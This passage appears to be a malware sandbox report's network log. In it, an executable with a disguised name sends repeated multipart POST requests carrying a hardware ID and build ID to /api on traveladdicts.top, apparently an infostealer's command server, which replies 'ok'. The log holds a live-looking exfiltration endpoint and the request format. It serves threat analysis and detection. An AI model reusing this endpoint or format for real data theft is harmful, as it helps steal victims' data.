                                                                                                                                                                  2025-01-28 15:15:59 UTC1369INData Raw: 6f 2b 31 4c 49 59 56 42 64 74 41 47 42 56 44 2b 45 75 6c 72 4a 79 72 50 73 62 4b 52 65 41 68 76 30 77 61 39 79 72 31 4e 76 73 4f 54 66 4e 39 51 6f 54 44 69 59 4f 5a 68 46 57 71 6d 6e 51 2b 6e 75 33 76 55 68 6c 4b 59 61 5a 36 7a 59 6a 78 4f 72 4b 6b 75 77 31 63 59 65 79 43 67 67 50 4b 42 56 6f 47 6c 79 7a 49 70 69 36 65 62 33 36 48 43 38 55 67 6f 66 32 4e 6d 76 4a 70 4e 37 53 2b 53 73 33 31 50 78 48 56 45 34 71 48 79 78 4e 46 35 41 2b 6c 66 70 6a 34 65 52 51 49 68 66 42 31 37 73 32 61 64 61 71 77 64 62 74 4d 6a 4c 52 2b 67 49 53 43 69 63 4b 59 78 35 64 71 43 47 65 74 58 6d 6e 39 68 59 72 47 6f 65 44 39 6e 55 74 6d 36 50 4c 6b 72 4e 35 46 73 58 2f 41 51 30 66 47 41 42 73 52 42 65 2b 5a 34 66 36 65 36 4f 39 53 47 55 57 6a 59 58 32 4d 47 66 54 6f 39 44 54 35
                                                                                                                                                                  Data Ascii: o+1LIYVBdtAGBVD+EulrJyrPsbKReAhv0wa9yr1NvsOTfN9QoTDiYOZhFWqmnQ+nu3vUhlKYaZ6zYjxOrKkuw1cYeyCggPKBVoGlyzIpi6eb36HC8Ugof2NmvJpN7S+Ss31PxHVE4qHyxNF5A+lfpj4eRQIhfB17s2adaqwdbtMjLR+gISCicKYx5dqCGetXmn9hYrGoeD9nUtm6PLkrN5FsX/AQ0fGABsRBe+Z4f6e6O9SGUWjYX2MGfTo9DT5
                                                                                                                                                                  2025-01-28 15:15:59 UTC1369INData Raw: 2b 52 30 4a 4f 49 77 70 71 46 46 61 70 49 5a 36 38 64 71 76 2b 47 53 59 63 69 49 6e 77 4e 6d 6e 55 6f 39 58 57 36 7a 49 32 30 66 51 43 45 51 64 74 53 53 77 53 54 2b 46 78 33 70 78 66 76 65 38 69 4b 78 69 61 7a 2b 52 37 65 70 75 6a 33 35 4b 7a 65 54 72 58 2f 52 55 66 42 79 55 44 5a 52 56 54 71 79 53 5a 75 6e 6d 69 2b 42 51 72 48 34 61 50 39 7a 70 6b 30 36 76 58 30 75 52 35 66 35 2f 31 48 31 70 57 62 53 64 6e 41 33 61 76 49 6f 7a 36 59 2b 48 6b 55 43 49 58 77 64 65 37 4f 32 72 61 72 4e 33 65 34 7a 30 6a 33 2f 6b 4f 46 51 38 69 42 32 38 55 58 61 6b 37 6d 4c 70 33 70 2f 6f 59 49 52 57 54 6a 76 52 31 4c 5a 75 6a 79 35 4b 7a 65 51 44 4a 39 51 41 56 54 41 51 41 64 78 52 64 6f 69 4b 53 2b 6d 50 68 35 46 41 69 46 38 48 58 75 7a 68 76 31 71 44 42 33 75 73 35 4f 4e
                                                                                                                                                                  Data Ascii: +R0JOIwpqFFapIZ68dqv+GSYciInwNmnUo9XW6zI20fQCEQdtSSwST+Fx3pxfve8iKxiaz+R7epuj35KzeTrX/RUfByUDZRVTqySZunmi+BQrH4aP9zpk06vX0uR5f5/1H1pWbSdnA3avIoz6Y+HkUCIXwde7O2rarN3e4z0j3/kOFQ8iB28UXak7mLp3p/oYIRWTjvR1LZujy5KzeQDJ9QAVTAQAdxRdoiKS+mPh5FAiF8HXuzhv1qDB3us5ON
                                                                                                                                                                  2025-01-28 15:15:59 UTC1369INData Raw: 41 43 67 47 59 42 39 51 72 7a 75 66 73 48 43 75 2b 68 63 75 43 59 71 64 38 44 31 67 31 61 7a 61 30 75 55 35 4d 4e 4c 79 52 31 52 4f 4b 68 38 73 54 52 65 45 43 6f 6d 73 64 75 33 65 42 7a 4d 52 68 6f 50 74 50 6d 4c 59 73 74 37 43 71 33 64 78 7a 76 55 57 57 6c 59 37 46 33 73 53 53 4f 38 77 33 72 31 77 37 36 56 51 4c 68 53 50 67 76 41 78 61 74 36 73 30 4e 66 75 4d 7a 33 54 38 77 38 54 42 43 67 43 61 68 39 55 72 79 61 66 74 6e 69 6d 38 78 6c 6c 56 63 47 49 34 33 55 37 6d 35 4c 44 31 66 4d 30 49 5a 33 41 42 41 73 66 4f 41 70 38 45 78 57 4f 4b 70 4b 35 65 61 6a 74 55 44 70 56 6d 4d 2f 38 4f 53 4f 44 35 4e 50 57 35 7a 6f 32 30 66 30 4b 46 51 6b 6d 43 47 59 62 52 61 34 73 6c 72 5a 30 6f 75 38 61 4c 77 6d 49 68 76 59 37 61 38 6d 6e 6b 35 79 72 50 69 6d 66 71 6b 63
                                                                                                                                                                  Data Ascii: ACgGYB9QrzufsHCu+hcuCYqd8D1g1aza0uU5MNLyR1ROKh8sTReEComsdu3eBzMRhoPtPmLYst7Cq3dxzvUWWlY7F3sSSO8w3r1w76VQLhSPgvAxat6s0NfuMz3T8w8TBCgCah9Uryaftnim8xllVcGI43U7m5LD1fM0IZ3ABAsfOAp8ExWOKpK5eajtUDpVmM/8OSOD5NPW5zo20f0KFQkmCGYbRa4slrZ0ou8aLwmIhvY7a8mnk5yrPimfqkc
                                                                                                                                                                  2025-01-28 15:15:59 UTC1369INData Raw: 31 4e 62 46 37 6c 70 78 76 70 4a 72 50 4d 65 49 67 32 51 77 74 6f 34 61 4e 65 70 33 4e 6d 72 64 33 48 5a 73 6c 39 4b 51 47 30 44 66 56 55 50 38 58 76 46 37 79 2f 34 72 55 49 36 56 5a 6a 50 37 58 55 37 69 65 71 54 77 4b 74 68 63 5a 6a 78 46 51 67 49 4c 68 46 76 55 6d 6d 66 43 6f 6d 73 64 72 53 2f 4e 69 49 4b 69 4a 6e 32 4a 31 33 6c 69 74 37 54 36 44 64 7a 37 75 51 4b 43 67 30 6f 41 46 49 72 57 61 59 39 6d 62 52 36 72 37 31 65 5a 52 54 42 31 38 4a 31 4b 35 75 62 6e 5a 4c 7a 65 57 6d 66 78 77 51 55 41 43 6f 52 66 56 68 30 74 6a 2b 55 6f 54 36 4a 2b 67 45 73 44 59 79 64 75 33 73 6a 33 65 53 4c 67 71 56 35 4e 63 36 79 58 30 70 63 64 6c 49 2f 51 67 66 7a 4e 74 43 6a 50 4c 6d 39 53 48 64 56 77 5a 32 37 62 53 4f 63 70 38 48 41 37 54 6f 6e 33 4c 55 35 4a 43 34 6d
                                                                                                                                                                  Data Ascii: 1NbF7lpxvpJrPMeIg2Qwto4aNep3Nmrd3HZsl9KQG0DfVUP8XvF7y/4rUI6VZjP7XU7ieqTwKthcZjxFQgILhFvUmmfComsdrS/NiIKiJn2J13lit7T6Ddz7uQKCg0oAFIrWaY9mbR6r71eZRTB18J1K5ubnZLzeWmfxwQUACoRfVh0tj+UoT6J+gEsDYydu3sj3eSLgqV5Nc6yX0pcdlI/QgfzNtCjPLm9SHdVwZ27bSOcp8HA7Ton3LU5JC4m
                                                                                                                                                                  2025-01-28 15:15:59 UTC1369INData Raw: 66 7a 63 73 76 70 4b 2f 2b 76 44 32 73 43 77 5a 6d 37 62 54 47 56 35 4d 47 53 73 33 6c 32 33 4f 41 56 48 41 30 37 42 43 73 72 61 5a 51 71 6b 4c 52 37 75 63 67 54 4e 42 69 42 68 4d 55 4c 51 74 57 76 31 4e 37 39 42 77 2f 71 38 51 6b 55 43 54 73 57 4c 46 73 58 72 6d 6e 47 67 7a 7a 6e 76 53 39 72 57 35 6e 50 6f 33 56 57 32 4b 72 64 31 66 30 6f 66 4f 72 78 46 68 6b 4f 4a 6b 63 69 56 56 48 68 63 63 7a 30 50 4b 76 73 55 48 31 4c 30 39 53 75 5a 6a 53 4c 39 73 79 63 38 6e 6b 6e 6e 36 70 56 56 45 34 2f 52 7a 52 56 45 4b 49 37 6a 4c 78 2f 75 66 35 58 47 79 57 6e 6a 50 77 7a 59 4e 57 7a 77 70 44 45 4f 6a 72 54 2f 67 41 4d 4d 42 4d 53 62 78 74 5a 70 6a 2b 50 2b 6a 4c 76 38 6c 42 39 49 73 47 65 38 54 49 76 6b 2b 6a 43 77 65 55 79 4a 39 69 79 4f 46 52 4f 4e 55 63 30 56
                                                                                                                                                                  Data Ascii: fzcsvpK/+vD2sCwZm7bTGV5MGSs3l23OAVHA07BCsraZQqkLR7ucgTNBiBhMULQtWv1N79Bw/q8QkUCTsWLFsXrmnGgzznvS9rW5nPo3VW2Krd1f0ofOrxFhkOJkciVVHhccz0PKvsUH1L09SuZjSL9syc8nknn6pVVE4/RzRVEKI7jLx/uf5XGyWnjPwzYNWzwpDEOjrT/gAMMBMSbxtZpj+P+jLv8lB9IsGe8TIvk+jCweUyJ9iyOFRONUc0V


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  2192.168.2.449738104.21.60.2414437412C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-28 15:16:01 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=XCBEHHM26E12S5C
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                  Content-Length: 18147
                                                                                                                                                                  Host: traveladdicts.top
                                                                                                                                                                  2025-01-28 15:16:01 UTC15331OUTData Raw: 2d 2d 58 43 42 45 48 48 4d 32 36 45 31 32 53 35 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 38 30 42 32 44 42 38 30 37 44 44 45 44 32 32 46 32 31 30 39 37 36 34 44 30 30 42 30 46 31 0d 0a 2d 2d 58 43 42 45 48 48 4d 32 36 45 31 32 53 35 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 43 42 45 48 48 4d 32 36 45 31 32 53 35 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 32 79 61 6e 31 0d 0a 2d 2d 58 43 42
                                                                                                                                                                  Data Ascii: --XCBEHHM26E12S5CContent-Disposition: form-data; name="hwid"8F80B2DB807DDED22F2109764D00B0F1--XCBEHHM26E12S5CContent-Disposition: form-data; name="pid"2--XCBEHHM26E12S5CContent-Disposition: form-data; name="lid"MeHdy4--pl2yan1--XCB
                                                                                                                                                                  2025-01-28 15:16:01 UTC2816OUTData Raw: 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77
                                                                                                                                                                  Data Ascii: d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!w
                                                                                                                                                                  2025-01-28 15:16:13 UTC1143INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 28 Jan 2025 15:16:13 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Set-Cookie: PHPSESSID=r5atj0ufh5dkmek95rgunqd0lf; expires=Sat, 24 May 2025 09:02:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m09N9tbEHJwwANVDAPP%2BUhxzf9SA%2B8JYx0cKEK9x7TgfgvTvt2JM5PeD5r%2BH5CXYhQZrZ8Emn4d%2BZRbnTfWzNEFqs%2B1%2Fs2pYbDyJhL9PQY9s3PzsYuLaD99Oa2pB7M%2Fr2flSyg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 9091f0f2d9fa1a3c-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2082&min_rtt=2075&rtt_var=793&sent=11&recv=23&lost=0&retrans=0&sent_bytes=2841&recv_bytes=19107&delivery_rate=1367041&cwnd=229&unsent_bytes=0&cid=e7c655c5a59b7b4c&ts=12196&x=0"
                                                                                                                                                                  2025-01-28 15:16:13 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                  2025-01-28 15:16:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  3192.168.2.449743104.21.60.2414437412C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-28 15:16:13 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=FB3100XCJPK
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                  Content-Length: 8744
                                                                                                                                                                  Host: traveladdicts.top
                                                                                                                                                                  2025-01-28 15:16:13 UTC8744OUTData Raw: 2d 2d 46 42 33 31 30 30 58 43 4a 50 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 38 30 42 32 44 42 38 30 37 44 44 45 44 32 32 46 32 31 30 39 37 36 34 44 30 30 42 30 46 31 0d 0a 2d 2d 46 42 33 31 30 30 58 43 4a 50 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 42 33 31 30 30 58 43 4a 50 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 32 79 61 6e 31 0d 0a 2d 2d 46 42 33 31 30 30 58 43 4a 50 4b 0d 0a 43 6f
                                                                                                                                                                  Data Ascii: --FB3100XCJPKContent-Disposition: form-data; name="hwid"8F80B2DB807DDED22F2109764D00B0F1--FB3100XCJPKContent-Disposition: form-data; name="pid"2--FB3100XCJPKContent-Disposition: form-data; name="lid"MeHdy4--pl2yan1--FB3100XCJPKCo
                                                                                                                                                                  2025-01-28 15:16:25 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 28 Jan 2025 15:16:25 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Set-Cookie: PHPSESSID=mt8d0l9o7vga9885knqf9dclk8; expires=Sat, 24 May 2025 09:03:04 GMT; Max-Age=9999999; path=/
                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ap2PrluycDd3LYKgoZG5S7f1QDqXBqsjdbtGYNhexGlV0tB%2FydOE1GhlkBNQPQ0cY%2B0wc95GJ6mnYU9Hd8E8LAR20Ji%2Ff3sGPtUaH9uVTHiT5yvUQh09VLdOohWAv3gqzrGTMA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 9091f142db13c42c-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1648&rtt_var=629&sent=7&recv=15&lost=0&retrans=0&sent_bytes=2841&recv_bytes=9677&delivery_rate=1723730&cwnd=232&unsent_bytes=0&cid=00283c2f59b3b97a&ts=11988&x=0"
                                                                                                                                                                  2025-01-28 15:16:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                  2025-01-28 15:16:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  4192.168.2.449744104.21.60.2414437412C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-28 15:16:26 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=2049G0Z2PZWMT
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                  Content-Length: 20409
                                                                                                                                                                  Host: traveladdicts.top
                                                                                                                                                                  2025-01-28 15:16:26 UTC15331OUTData Raw: 2d 2d 32 30 34 39 47 30 5a 32 50 5a 57 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 38 30 42 32 44 42 38 30 37 44 44 45 44 32 32 46 32 31 30 39 37 36 34 44 30 30 42 30 46 31 0d 0a 2d 2d 32 30 34 39 47 30 5a 32 50 5a 57 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 32 30 34 39 47 30 5a 32 50 5a 57 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 32 79 61 6e 31 0d 0a 2d 2d 32 30 34 39 47 30 5a 32 50
                                                                                                                                                                  Data Ascii: --2049G0Z2PZWMTContent-Disposition: form-data; name="hwid"8F80B2DB807DDED22F2109764D00B0F1--2049G0Z2PZWMTContent-Disposition: form-data; name="pid"3--2049G0Z2PZWMTContent-Disposition: form-data; name="lid"MeHdy4--pl2yan1--2049G0Z2P
                                                                                                                                                                  2025-01-28 15:16:26 UTC5078OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                                                                                  2025-01-28 15:16:38 UTC1137INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 28 Jan 2025 15:16:38 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Set-Cookie: PHPSESSID=17g2o9tefhmi0v3580bg3lj208; expires=Sat, 24 May 2025 09:03:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wWq60JWQcllB80Q8QiuYrboEaXEuhqhqmDLPFrX%2B4yd2b0WDsyfxafojNs2V8D%2FHvO9J%2BxvYzAccvZWxC0dPGRso6wfcYy%2F60BXkubhK6VQOCW918RKWjqlndws2aSYrCjQDHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 9091f19309bb32d9-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2012&min_rtt=1995&rtt_var=783&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2841&recv_bytes=21367&delivery_rate=1368322&cwnd=176&unsent_bytes=0&cid=5bcc7ac5ac7487b0&ts=12188&x=0"
                                                                                                                                                                  2025-01-28 15:16:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                                                                                  2025-01-28 15:16:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  5192.168.2.449752104.21.60.2414437412C:\Users\user\Desktop\#Ud835#Udc7a#Ud835#Udc6c#Ud835#Udc7b#Ud835#Udc7c#Ud835#Udc77.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-01-28 15:16:40 UTC272OUTPOST /api HTTP/1.1
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: multipart/form-data; boundary=JZ1454JT
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                  Content-Length: 2541
                                                                                                                                                                  Host: traveladdicts.top
                                                                                                                                                                  2025-01-28 15:16:40 UTC2541OUTData Raw: 2d 2d 4a 5a 31 34 35 34 4a 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 38 30 42 32 44 42 38 30 37 44 44 45 44 32 32 46 32 31 30 39 37 36 34 44 30 30 42 30 46 31 0d 0a 2d 2d 4a 5a 31 34 35 34 4a 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4a 5a 31 34 35 34 4a 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 32 79 61 6e 31 0d 0a 2d 2d 4a 5a 31 34 35 34 4a 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73
                                                                                                                                                                  Data Ascii: --JZ1454JTContent-Disposition: form-data; name="hwid"8F80B2DB807DDED22F2109764D00B0F1--JZ1454JTContent-Disposition: form-data; name="pid"1--JZ1454JTContent-Disposition: form-data; name="lid"MeHdy4--pl2yan1--JZ1454JTContent-Dispos
                                                                                                                                                                  2025-01-28 15:16:40 UTC1130INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 28 Jan 2025 15:16:40 GMT
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Set-Cookie: PHPSESSID=jak8ug24nqpd6pisn1rrrlg6hm; expires=Sat, 24 May 2025 09:03:19 GMT; Max-Age=9999999; path=/
                                                                                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  X-Frame-Options: DENY
                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                  vary: accept-encoding
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uIV977suXn2FepsuNb09%2FXcMOIivoIENH0HRgVjExwhpDDLm%2FYrCvnYOvC8ZD1xFy1sQfgz9flN60Z5nYUPaiLSsWMezsI6M5Vl2yisWCMwxTdy4AODCZveAGmN1qPH%2FnXL9rg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 9091f1e768fdefa3-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2001&min_rtt=1982&rtt_var=782&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=3449&delivery_rate=1364485&cwnd=159&unsent_bytes=0&cid=2d679793e1a06eca&ts=771&x=0"
